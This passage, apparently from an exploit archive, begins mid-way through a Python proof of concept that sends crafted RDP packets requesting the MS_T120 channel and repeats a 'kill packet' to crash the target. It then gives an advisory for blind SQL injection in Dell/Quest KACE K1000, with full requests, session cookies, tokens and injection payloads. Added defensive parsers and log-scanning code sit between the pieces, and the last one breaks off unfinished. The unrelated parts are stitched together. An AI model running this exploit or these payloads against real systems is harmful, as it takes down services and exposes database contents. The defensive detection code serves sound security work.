	     "\x00\x08\x00\x01\x00\x00\x00\x18\x00\x0b\x00\x02\x00\x00\x00\x03\x0c\x00\x1d\x00\x5f\x00\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04")
	ba = bytearray()
	ba.extend(map(ord, p))
	tls.sendall(bytes(ba))

def send_establish_session(tls):
	p = b"\x03\x00\x00\x24\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x16\x16\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x08\x00\x1f\x00\x00\x00\x01\x00\xea\x03"
	tls.sendall(p)
	p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x0c\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00"
	tls.sendall(p)
	p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x0c\x00\x14\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
	tls.sendall(p)
	p = (b"\x03\x00\x05\x81\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x85\x72\x72\x05\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x00\x02\x00\x00\x00\xa3\xce\x20\x35\xdb\x94\xa5\xe6\x0d\xa3\x8c\xfb\x64\xb7\x63\xca\xe7\x9a\x84\xc1\x0d\x67\xb7\x91\x76\x71\x21\xf9\x67\x96\xc0\xa2\x77\x5a\xd8\xb2\x74\x4f\x30\x35\x2b\xe7\xb0\xd2\xfd\x81\x90\x1a\x8f\xd5\x5e\xee\x5a\x6d\xcb\xea\x2f\xa5\x2b\x06\xe9\x0b\x0b\xa6\xad\x01\x2f\x7a\x0b\x7c\xff\x89\xd3\xa3\xe1\xf8\x00\x96\xa6\x8d\x9a\x42\xfc\xab\x14\x05\x8f\x16\xde\xc8\x05\xba\xa0\xa8\xed\x30\xd8\x67\x82\xd7\x9f\x84\xc3\x38\x27\xda\x61\xe3\xa8\xc3\x65\xe6\xec\x0c\xf6\x36\x24\xb2\x0b\xa6\x17\x1f\x46\x30\x16\xc7\x73\x60\x14\xb5\xf1\x3a\x3c\x95\x7d\x7d\x2f\x74\x7e\x56\xff\x9c\xe0\x01\x32\x9d\xf2\xd9\x35\x5e\x95\x78\x2f\xd5\x15\x6c\x18\x34\x0f\x43\xd7\x2b\x97\xa9\xb4\x28\xf4\x73\x6c\x16\xdb\x43\xd7\xe5\x58\x0c\x5a\x03\xe3\x73\x58\xd7\xd9\x76\xc2\xfe\x0b\xd7\xf4\x12\x43\x1b\x70\x6d\x74\xc2\x3d\xf1\x26\x60\x58\x80\x31\x07\x0e\x85\xa3\x95\xf8\x93\x76\x99\x9f\xec\xa0\xd4\x95\x5b\x05\xfa\x4f\xdf\x77\x8a\x7c\x29\x9f\x0b\x4f\xa1\xcb\xfa\x95\x66\xba\x47\xe3\xb0\x44\xdf\x83\x03\x44\x24\xf4\x1e\xf2\xe5\xcb\xa9\x53\x04\xc2\x76\xcb\x4d\xc6\xc2\xd4\x3f\xd3\x8c\xb3\x7c\xf3\xaa\xf3\x93\xfe\x25\xbd\x32\x7d\x48\x6e\x93\x96\x68\xe5\x18\x2b\xea\x84\x25\x69\x02\xa5\x38\x65\x6f\x0f\x9f\xf6\xa1\x3a\x1d\x22\x9d\x3f\x6d\xe0\x4c\xee\x8b\x24\xf0\xdc\xff\x70\x52\xa7\x0d\xf9\x52\x8a\x1e\x33\x1a\x30\x11\x15\xd7\xf8\x95\xa9\xbb\x74\x25\x8c\xe3\xe9\x93\x07\x43\xf5\x50\x60\xf7\x96\x2e\xd3\xff\x63\xe0\xe3\x24\xf1\x10\x3d\x8e\x0f\x56\xbc\x2e\xb8\x90\x0c\xfa\x4b\x96\x68\xfe\x59\x68\x21\xd0\xff\x52\xfe\x5c\x7d\x90\xd4\x39\xbe\x47\x9d\x8e\x7a\xaf\x95\x4f\x10\xea\x7b\x7a\xd3\xca\x07\x28\x3e\x4e\x4b\x81\x0e\xf1\x5f\x1f\x8d\xbe\x06\x40\x27\x2f\x4a\x03\x80\x32\x67\x54\x2f\x93\xfd\x25\x5d\x6d\xa0\xad\x23\x45\x72\xff\xd1\xeb\x5b\x51\x75\xa7\x61\xe0\x3f\xe4\xef\xf4\x96\xcd\xa5\x13\x8a\xe6\x52"
	     b"\x74\x70\xbf\xc1\xf9\xfb\x68\x9e\xdd\x72\x8f\xb4\x44\x5f\x3a\xcb\x75\x2a\x20\xa6\x69\xd2\x76\xf9\x57\x46\x2b\x5b\xda\xba\x0f\x9b\xe0\x60\xe1\x8b\x90\x33\x41\x0a\x2d\xc5\x06\xfe\xd0\xf0\xfc\xde\x35\xd4\x1e\xaa\x76\x0b\xae\xf4\xd5\xbd\xfa\xf3\x55\xf5\xc1\x67\x65\x75\x1c\x1d\x5e\xe8\x3a\xfe\x54\x50\x23\x04\xae\x2e\x71\xc2\x76\x97\xe6\x39\xc6\xb2\x25\x87\x92\x63\x52\x61\xd1\x6c\x07\xc1\x1c\x00\x30\x0d\xa7\x2f\x55\xa3\x4f\x23\xb2\x39\xc7\x04\x6c\x97\x15\x7a\xd7\x24\x33\x91\x28\x06\xa6\xe7\xc3\x79\x5c\xae\x7f\x50\x54\xc2\x38\x1e\x90\x23\x1d\xd0\xff\x5a\x56\xd6\x12\x91\xd2\x96\xde\xcc\x62\xc8\xee\x9a\x44\x07\xc1\xec\xf7\xb6\xd9\x9c\xfe\x30\x1c\xdd\xb3\x3b\x93\x65\x3c\xb4\x80\xfb\xe3\x87\xf0\xee\x42\xd8\xcf\x08\x98\x4d\xe7\x6b\x99\x0a\x43\xed\x13\x72\x90\xa9\x67\xfd\x3c\x63\x36\xec\x55\xfa\xf6\x1f\x35\xe7\x28\xf3\x87\xa6\xce\x2e\x34\xaa\x0d\xb2\xfe\x17\x18\xa2\x0c\x4e\x5f\xf0\xd1\x98\x62\x4a\x2e\x0e\xb0\x8d\xb1\x7f\x32\x52\x8e\x87\xc9\x68\x7c\x0c\xef\xee\x88\xae\x74\x2a\x33\xff\x4b\x4d\xc5\xe5\x18\x38\x74\xc7\x28\x83\xf7\x72\x87\xfc\x79\xfb\x3e\xce\xd0\x51\x13\x2d\x7c\xb4\x58\xa2\xe6\x28\x67\x4f\xec\xa6\x81\x6c\xf7\x9a\x29\xa6\x3b\xca\xec\xb8\xa1\x27\x50\xb7\xef\xfc\x81\xbf\x5d\x86\x20\x94\xc0\x1a\x0c\x41\x50\xa9\x5e\x10\x4a\x82\xf1\x74\x1f\x78\x21\xf5\x70\x61\x24\x00\x3d\x47\x5f\xf3\x25\x80\x3c\x4b\xea\xa3\xf4\x77\xea\xa1\x42\x1a\x17\x0f\x6d\xa8\x35\x9e\x91\x26\x34\x43\x04\xc6\xc6\x5b\x21\x7d\x8c\xc7\x22\x91\x7b\x2c\x2d\x2f\xd6\x7e\xa5\x52\xa8\x08\x80\xeb\x60\xd1\x44\x09\x8e\x3c\xa1\xaa\x67\x60\x0a\x26\xc6\xb5\xc6\x79\xa6\x4f\x8b\x8c\x25\x5c\xf1\x0b\x23\xf4\xd8\xa6\x6d\xf1\x91\x78\xf9\xe5\x2a\x50\x2f\x5a\x44\x22\xd9\x19\x5c\xaf\xd6\xac\x97\xa2\xf8\x0d\x0c\xe3\xdd\x88\x48\x98\x28\x0b\x8b\xbd\x76\xdc\xde\xca\xe2\xc2\x4a\x87\x50\xd4\x8c\x77\x5a\xd8\xb2\x74\x4f\x30\x35\xbf\x28\xae\xd9\xa2\x98\xa5\xbc\x60\xca\xb8\x90\x4d\x20\x46\xd9\x8a\x1a\x30\x01\x8b\x38\x63\x1a\x57\x09\x51\x46\x95\x9b\xd8\x80\x0c\xb0\x77\x24\xbf\x2b\xd3\x57\x22\xd9\x19\x5c\xaf\xd6\xac\x97\xa2\xf8\x0d\x0c\xe3"
	     b"\xdd\x88\x48\x98\x28\x0b\x8b\xbd\x76\xdc\xde\xca\xe2\xc2\x4a\x87\x50\xd4\x8c\x56\x92\x38\xed\x6b\x9b\x5b\x1f\xba\x53\xa1\x0e\xf7\x75\x10\x53\x22\x4c\x0a\x75\x88\x54\x69\x3f\x3b\xf3\x18\x67\x6b\x0f\x19\xd1\x00\x25\x86\xcd\xa8\xd9\xdd\x1d\x8d\x26\x87\x54\xd9\x79\xc0\x74\x65\x90\xd7\x33\x32\xaf\xba\x9d\x5a\xd5\x6c\x7c\xa1\x47\xe1\x49\x6e\x1c\xce\x9f\x62\xaa\x26\x16\x3f\x3c\xec\x5b\x49\xe5\xc0\x60\xd4\xbe\xa7\x88\xbc\xa1\x9f\x29\x71\x8c\xeb\x69\xf8\x73\xfb\xaf\x29\xaa\x40\x1b\xe5\x92\xd2\x77\xa7\x2b\xfb\xb6\x77\xb7\x31\xfb\xdc\x1e\x63\x63\x7d\xf2\xfe\x3c\x6a\xba\x0b\x20\xcb\x9d\x64\xb8\x31\x14\xe2\x70\x07\x2c\xdf\x9c\x6f\xb5\x3a\xc4\xd5\xb5\xc9\x3e\x9a\xd7\xd5\x30\xdc\x0e\x19\x89\xc6\x08\x88\xe1\xca\x81\xa6\x28\xdd\x9c\x74\x05\x11\xe7\xe1\xcc\xbc\xc7\x76\xdd\x55\xe2\xcc\xc2\xcb\xd3\xb6\x48\x01\xdd\xff\xba\xca\x31\xab\x26\x44\x1c\xdc\x06\x01\xdf\xf2\x90\x50\xb8\x6b\x8f\xe8\x29\xf0\xba\xec\xfb\x2d\xfd\x7a\xfc\x7f\x57\xbd\xea\x90\xf7\xcf\x92\x1e\xc4\x20\xd0\xb6\x9f\xd6\xdc\xa1\x82\xa9\x6c\x5e\x3e\x83\x41\x57\x73\xe9\xe7\x5a\x3f\xda\x24\x4f\x73\x5e\xf4\xe0\x92\x24\xbd\x0b\xd0\x3c\x49\x96\xb5\xb5\x05\x32\xcb\x58\x1d\x6f\x97\x51\xee\x0c\xdc\x0b\x2a\x60\xef\x97\x3e\x5a\x30\x81\x15\x91\xcf\x11\x07\x25\x2c\x41\xdb\x70\x72\xe1\x75\xf6\xa5\xff\xe8\x44\xe7\x03\xe3\x61\xaa\xdb\xe0\x07\x3d\x07\x0b\xe3\x5c\x09\xa9\x5e\x10\xfd\xcf\x74\x9e\x23\xf1\x30\x86\x16\xef\x25\x4e\xfe\xa4\x93\xa5\x80\x0a\x01\x39\xcc\x11\x7a\x6e\x94\x22\x5b\xd8\xc6\xc9\xa8\xdf\x13\x96\xb3\x91\x33\x6e\x87\xbb\x94\x63\x2d\x88\x64\xa7\x58\x89\xda\xdc\x7f\x2a\xe3\xa1\x66\xe5\xc8\x7f\xc2\xdb\xc7\x7d\x2f\xa9\x46\x28\x45\x69\xbc\xac\x9f\x85\x9e\xb0\x9f\x9a\x49\xb4\xb1\xcb")
	tls.sendall(p)
	p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x00\x00\x27\x00\x00\x00\x00\x00\x00\x00\x03\x00\x32\x00"
	tls.sendall(p)

def send_kill_packet(tls, arch):
	if arch == "32":
		p = b"\x03\x00\x00\x2e\x02\xf0\x80\x64\x00\x07\x03\xef\x70\x14\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	elif arch == "64":
		p = b"\x03\x00\x00\x2e\x02\xf0\x80\x64\x00\x07\x03\xef\x70\x14\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	else:
		print("Make the second argument '32' or '64' without quotes")
		sys.exit()
	tls.sendall(p)

def terminate_connection(tls):
	p = b"\x03\x00\x00\x09\x02\xf0\x80\x21\x80"
	tls.sendall(p)

def main(args):
	tls = send_init_packets(args[1])

	send_client_data(tls)
	print("[+] ClientData Packet Sent")

	send_channel_packets(tls)
	print("[+] ChannelJoin/ErectDomain/AttachUser Sent")

	send_client_info(tls)
	print("[+] ClientInfo Packet Sent")

	tls.recv(8192)
	tls.recv(8192)

	send_confirm_active(tls, None)
	print("[+] ConfirmActive Packet Sent")

	send_establish_session(tls)
	print("[+] Session Established")

	send_kill_packet(tls, args[2])
	terminate_connection(tls)
	print("[+] Vuln Should Trigger")

if __name__ == '__main__':
	if len(sys.argv) != 3:
		print("Usage: python poc.py 127.0.0.1 64")
		sys.exit()

	elif sys.argv[2] in ('32', '64'):
		# I've had to send the packets 5 times for hosts that haven't
		# had a terminal session since their last reboot. I think
		# I know why, but at the moment it's just easier to send the exchange
		# 5 times and it'll crash eventually. Most of the time it's
		# the first time though.
		for _ in range(5):
			main(sys.argv)

	else:
		print("Usage: python poc.py 127.0.0.1 64")
		sys.exit()
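As an added defensive example (my code, not part of the PoC above), the following parses the client network data block of the ClientData PDU that send_client_data() transmits, using the layout visible in its byte string (the "Duca" key and PER length, then TS_UD_HEADER blocks, of which 0xC003 carries channelCount and 12-byte CHANNEL_DEF entries), and flags a client that asks for the MS_T120 channel by name. POC_CS_NET is copied from the PoC's bytes; build_sample_pdu() constructs test input with stub blocks, and the block-type constants are assumed from the standard PDU layout.

```python
"""Extract the static virtual channel names an RDP ClientData PDU requests and
flag a client that names MS_T120, as the PoC above does."""
import struct

CS_NET = 0xC003            # TS_UD_HEADER type of the client network data block
GCC_KEY = b"Duca"          # H.221 key that immediately precedes the client user data

# CS_NET block exactly as it appears at the end of the PoC's ClientData PDU:
# type 0xC003, length 0x38, channelCount 4, then four 12-byte CHANNEL_DEF entries.
POC_CS_NET = (b"\x03\xc0\x38\x00\x04\x00\x00\x00"
              b"rdpsnd\x00\x00\x0f\x00\x00\xc0"
              b"cliprdr\x00\x00\x00\xa0\xc0"
              b"drdynvc\x00\x00\x00\x80\xc0"
              b"MS_T120\x00\x00\x00\x00\x00")


def parse_user_data_blocks(pdu):
    """Return (type, payload) pairs for each TS_UD_HEADER block following 'Duca'."""
    idx = pdu.find(GCC_KEY)
    if idx < 0:
        raise ValueError("no GCC client user data in PDU")
    pos = idx + len(GCC_KEY)
    # PER length determinant: one byte below 0x80, otherwise two bytes with the top bit set
    if pdu[pos] & 0x80:
        ud_len = ((pdu[pos] & 0x7F) << 8) | pdu[pos + 1]
        pos += 2
    else:
        ud_len = pdu[pos]
        pos += 1
    end = min(pos + ud_len, len(pdu))
    blocks = []
    while pos + 4 <= end:
        btype, blen = struct.unpack_from("<HH", pdu, pos)
        if blen < 4 or pos + blen > end:
            raise ValueError("bad TS_UD_HEADER length %d at offset %d" % (blen, pos))
        blocks.append((btype, pdu[pos + 4:pos + blen]))
        pos += blen
    return blocks


def parse_cs_net_channels(payload):
    """Decode CHANNEL_DEF entries (8-byte NUL-padded name + u32 options) from a CS_NET payload."""
    (count,) = struct.unpack_from("<I", payload, 0)
    if 4 + count * 12 > len(payload):
        raise ValueError("channelCount %d exceeds CS_NET block length" % count)
    channels = []
    for i in range(count):
        raw_name, options = struct.unpack_from("<8sI", payload, 4 + i * 12)
        name = raw_name.split(b"\x00", 1)[0].decode("ascii", "replace")
        channels.append((name, options))
    return channels


def requested_channels(pdu):
    """All static virtual channel names a ClientData PDU asks the server to join."""
    names = []
    for btype, payload in parse_user_data_blocks(pdu):
        if btype == CS_NET:
            names.extend(name for name, _ in parse_cs_net_channels(payload))
    return names


def requests_ms_t120(pdu):
    """True when the client names MS_T120, a channel ordinary clients do not ask for."""
    return any(name.upper() == "MS_T120" for name in requested_channels(pdu))


def _block(btype, payload):
    return struct.pack("<HH", btype, 4 + len(payload)) + payload


def build_sample_pdu(channel_names):
    """Constructed test input: a GCC user-data section with stub CS_CORE, CS_CLUSTER and
    CS_SECURITY blocks and a CS_NET block listing channel_names. Only the type/length
    framing matters to the parser (a real CS_CORE block is 0xEA bytes long)."""
    chan_defs = b"".join(struct.pack("<8sI", name.encode("ascii"), 0) for name in channel_names)
    cs_net = struct.pack("<I", len(channel_names)) + chan_defs
    user_data = (_block(0xC001, bytes(8)) + _block(0xC004, bytes(8))
                 + _block(0xC002, bytes(8)) + _block(CS_NET, cs_net))
    # two-byte PER length with the top bit set, as in the PoC's \x81\x34
    return GCC_KEY + struct.pack(">H", 0x8000 | len(user_data)) + user_data


if __name__ == "__main__":
    for chans in (["rdpsnd", "cliprdr", "drdynvc", "MS_T120"], ["rdpsnd", "cliprdr"]):
        pdu = build_sample_pdu(chans)
        print(requested_channels(pdu), "-> MS_T120 requested:", requests_ms_t120(pdu))
```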
            
# Exploit Title: [Dell Kace Appliance Multiple Vulnerabilities]
# Date: [12/04/2018]
# Exploit Author: [SlidingWindow],  Twitter: @kapil_khot
# Vendor Homepage: [https://www.quest.com/products/kace-systems-management-appliance/]
# Affected Versions: [KACE SMA versions prior to 9.0.270 PATCH SEC2018_20180410]
# Tested on: [Quest Kace K1000 Appliance versions, 8.0.318, 8.0.320 and 9.0.270 ]
# CVE : [CVE-2018-5404,CVE-2018-5405,CVE-2018-5406]
# CERT Advisory: [https://www.kb.cert.org/vuls/id/877837/]
# Vendor Advisory: [https://support.quest.com/kb/288310/cert-coordination-center-report-update]


==================
#Product:-
==================
Quest KACE, formerly Dell KACE, is a company that specializes in computer appliances for systems management of information technology equipment. It also provides software for security, application virtualization, and systems management products.

==================
#Vulnerability:-
==================
The Dell Kace K1000 Appliance (now Quest Kace K1000) suffers from several vulnerabilities: multiple Blind SQL Injection flaws, a Stored Cross-Site Scripting flaw, and misconfigured CORS.

========================
#Vulnerability Details:-
========================

=====================================================================================================================================================
1. Blind SQL Injection Vulnerability in Ajax_Lookup_List.PHP (CVE-2018-5404)
=====================================================================================================================================================

The Dell Kace intends ajax_lookup_list.php for Admin users, but it can also be accessed by a least-privileged user with 'User Console Only' rights. In addition, the user input supplied to the 'selvalue' parameter is not sanitized, which leads to a Blind SQL Injection vulnerability.

#Proof-Of-Concept:
------------------
1. Send the following request to the target:

GET /common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 HTTP/1.1
Host: 192.168.247.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.247.100/userui/ticket.php?QUEUE_ID=1
Cookie: kbox_nav=1; KACE_LAST_USER=%98%B59%CB%D9%27f+%28%B6%83b%0F8a%EF; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i0b4qhnv66qg41893hb1q5g146; KACE_CSRF_TOKEN=4862fbb6808731e6658aeca4ea48bd2cac08502ca289e1d3305875b165fb2c86d5441145152ada3f3c701cf2387db6086e7c349c5265ec3b2110978a70ebde6f; KONEA=ebWI%2BP%2FFEgmTioFCZ3xVTgsN174jAtY0mkDdAov5uZtJEpn2FziBYMEinZsmN63zlNfEooUtIXJDgiJgmSKfFk3VvQguPiEAYQIaYpMhcFRQkfyANLWQy2tJzS8mByjYxJZlBRcYhJYlVqAMppyuikdVPOQRynpbiRNSIqVlX0wyxIBFaoF4b8O09p4wYkritpr1qM%2BMoLmA2n3%2BQCY2u%2FvD8DdrIVtm8t2%2BNxMVCCZjfpqpjKef73l7xx2yBxlV9kRG04gPNHXFfv8f4TZB82%2FvurTFqgOWThxp51YjdpWfssEJQsss1O1B3FtYEH0h83Wrl9ABzsRx%2FZafVGjQTw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjozLCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6IjRkMzkwY2M2ODMzZTRkMjk4MTI0NzYyYmQwYjdiNzRjIiwiZXhwIjoxNTIxMzA3NTExfQ.S9h0USN7xS0VmeapB6zWqKnAW-e-vd9J9-NrH9383gSXX6K_vEgXSv0FpuPGCtYQ2I3o7gxuYBKxy_qCqp1xd2w2NRowiZb5_WlwoHBWeTnaP3D9Y6Ek4nd9CKgPaZF1Y8TtaZkdbbWWFTdjtpkD3CK5eNHX_lsqtPD_gVJWwxc
Connection: close

2. Make a note of the Content-Length of the response.

3. Send the following request:

http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13'&queue_id=1&limit=10&org_id=1&locale=en_US&id=13

4. The response to the above request shows that an error occurred and that we are redirected to /common/error.php.

5. Final payload to check if we get the original response back:

http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13''&queue_id=1&limit=10&org_id=1&locale=en_US&id=13

6. These tests confirm that the 'selvalue' parameter is indeed vulnerable to Blind SQL Injection. This can be exploited further by modifying the payload or using SQLMap to retrieve sensitive information from the database.



=========================================================================================================================================================
2. Blind SQL Injection Vulnerability in Oval_Detail.PHP (CVE-2018-5404)
=========================================================================================================================================================

The Dell Kace allows Admin users to view OVAL templates via 'oval_detail.php', which can also be accessed by a user with 'Read Only Administrator' rights. In addition, the user input supplied to the ID parameter is not sanitized, which leads to a Blind SQL Injection vulnerability.
An authenticated user with 'Read Only Administrator' rights could exploit this vulnerability to retrieve sensitive information from the database.

#Proof-Of-Concept:
------------------
1. Send the following request to the target:

GET /adminui/oval_detail.php?ID=6200 HTTP/1.1
Host: 192.168.247.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.247.100/adminui/oval_list.php
Cookie: kbox_nav=1; KACE_LAST_USER=%9A%95%91%5E%AF%B2%A6%FA%02M%B5%7D%08%87%D52; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i48m8gm8kcnbiptc28pq8u7uq1; KACE_CSRF_TOKEN=96acbdac36b0143958a7d96ba318eb5c626884d46733a8ed05c88cfe94d80cfdebe6bd9790ff4fec3a79fa988ff828dac4d841356c72eebb015d20c5ffd5a01a; KONEA=xvqV3k6fWuhsnypD45pPw4OPs7fZxUDP24mubodoYiSj8Y8EqJpUnakrq%2BHEefSs0YkzglNboWvUhE%2FuavTZZrkyNPMF1IH2QB%2FIF7jSm6fLukuuMyLgTFZWtOg16t5eJqCXvn0f54tfwFnfB1tobY%2Fu6MDe8BOWKaj6mByvdD6kNREg%2B%2FLwAcfIYmgJNKYu0Wd9JwsRpWpuRyZkejbrZB%2FSlkh80oHvHSey0inQmIy7B4bYnPCPUfTU8qPeZLaPcvYFchruj%2BabBazlHAaq44txeUy2AtG85ntiN8XPXoZnflHOD%2B5WjTywTtRGiRpCQVQNDbHTOdSUuljpDEyjrw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjo0LCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6ImVlMTk3ZGE5NmFmYTRiYzViYzk5Y2VhMzI3ZjQ2OTdiIiwiZXhwIjoxNTIxMjk3MzE5fQ.GHuAWu_mcviKl0HQcFjY0In5aJxgB-WZCaHP5XQMdpdboby0b1qnwh4DyC3TQg4PktBm_D0Vu4LOMY5KWGRvwOQCTwrzBFLg3ogsKWb0AMO3RArrENXxEO3P3K6XFQCEIlpU9n9K1APnnRSTsfPEL7GC5GkzixakXAlZMZzLB_0
Connection: close
Upgrade-Insecure-Requests: 1

2. The response to the above request returns content with a Content-Length of 32109 bytes:

3. It shows information about OVAL-ID#24253:

4. Now send the following payload, which tests the ID parameter for a true condition:

	http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6432

5. The response to the above request again shows information about the same OVAL-ID#24252:

6. Now use the following payload to test the ID parameter for a false condition:
	
	http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6444

7. The response to the false condition differs from the response to the normal and true conditions: it does not show information about any OVAL-ID.

8. These tests confirm that the ID parameter is indeed vulnerable to Blind SQL Injection. This can be exploited further by modifying the payload or using SQLMap to retrieve sensitive information from the database.
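To turn PoC 1 and PoC 2 into something a defender can look for, the following added example (my code, not part of the advisory) scans access-log lines for the two probe shapes the advisory uses: a numeric parameter followed by stray quotes (selvalue=13' and 13'' in PoC 1) and a numeric parameter with an appended AND n=m comparison (ID=6200 AND 6432=6432 / 6444 in PoC 2), then pairs the true and false comparisons from one client and checks for the response-size difference that step 7 of PoC 2 observes by eye. The log lines, client address, timestamps and sizes are constructed; the paths and parameter values are the advisory's.

```python
"""Flag the boolean blind-SQLi probe sequences from PoC 1 and PoC 2 in web server logs."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines in Apache/nginx "combined"-style format, modelled on the
# requests in PoC 1 and 2; client IP, timestamps and response sizes are made up.
SAMPLE_LOG = """\
192.168.247.1 - - [12/Apr/2018:10:01:02 +0000] "GET /common/ajax_lookup_list.php?query_type=submitter&selvalue=13&queue_id=1&org_id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.247.1 - - [12/Apr/2018:10:01:05 +0000] "GET /common/ajax_lookup_list.php?query_type=submitter&selvalue=13%27&queue_id=1&org_id=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.247.1 - - [12/Apr/2018:10:01:09 +0000] "GET /common/ajax_lookup_list.php?query_type=submitter&selvalue=13''&queue_id=1&org_id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.247.1 - - [12/Apr/2018:10:02:00 +0000] "GET /adminui/oval_detail.php?ID=6200 HTTP/1.1" 200 32109 "-" "Mozilla/5.0"
192.168.247.1 - - [12/Apr/2018:10:02:07 +0000] "GET /adminui/oval_detail.php?ID=6200+AND+6432=6432 HTTP/1.1" 200 32109 "-" "Mozilla/5.0"
192.168.247.1 - - [12/Apr/2018:10:02:12 +0000] "GET /adminui/oval_detail.php?ID=6200+AND+6432=6444 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
192.168.247.1 - - [12/Apr/2018:10:03:00 +0000] "GET /userui/ticket.php?QUEUE_ID=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# "13'" / "13''": a numeric value followed by one or more stray quotes (PoC 1)
QUOTE_PROBE_RE = re.compile(r"^\d+'+$")
# "6200 AND 6432=6432": a numeric value with an appended boolean comparison (PoC 2)
BOOL_PROBE_RE = re.compile(r"^\d+\s+(?:AND|OR)\s+(\d+)\s*=\s*(\d+)$", re.IGNORECASE)


def parse_line(line):
    """Split one combined-format log line into ip, path, decoded parameters, status and size."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl turns %27 into ' and + into a space, so a probe looks the same however it was sent
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def classify_value(value):
    """Name the probe type a parameter value matches, or None for a benign value."""
    if QUOTE_PROBE_RE.match(value):
        return "quote-probe"
    m = BOOL_PROBE_RE.match(value)
    if m:
        return "bool-true" if m.group(1) == m.group(2) else "bool-false"
    return None


def scan_log(text):
    """Return one finding per (request, parameter) whose value looks like a blind-SQLi probe."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            kind = classify_value(value)
            if kind is not None:
                findings.append({"line": lineno, "ip": rec["ip"], "path": rec["path"],
                                 "param": name, "value": value, "kind": kind,
                                 "status": rec["status"], "size": rec["size"]})
    return findings


def confirmed_boolean_probes(findings):
    """(ip, path, param) triples where one client sent both a true and a false comparison
    and received responses of different sizes: the differential PoC 2 checks by hand."""
    sizes = defaultdict(dict)
    for f in findings:
        if f["kind"] in ("bool-true", "bool-false"):
            sizes[(f["ip"], f["path"], f["param"])][f["kind"]] = f["size"]
    return sorted(key for key, seen in sizes.items()
                  if "bool-true" in seen and "bool-false" in seen
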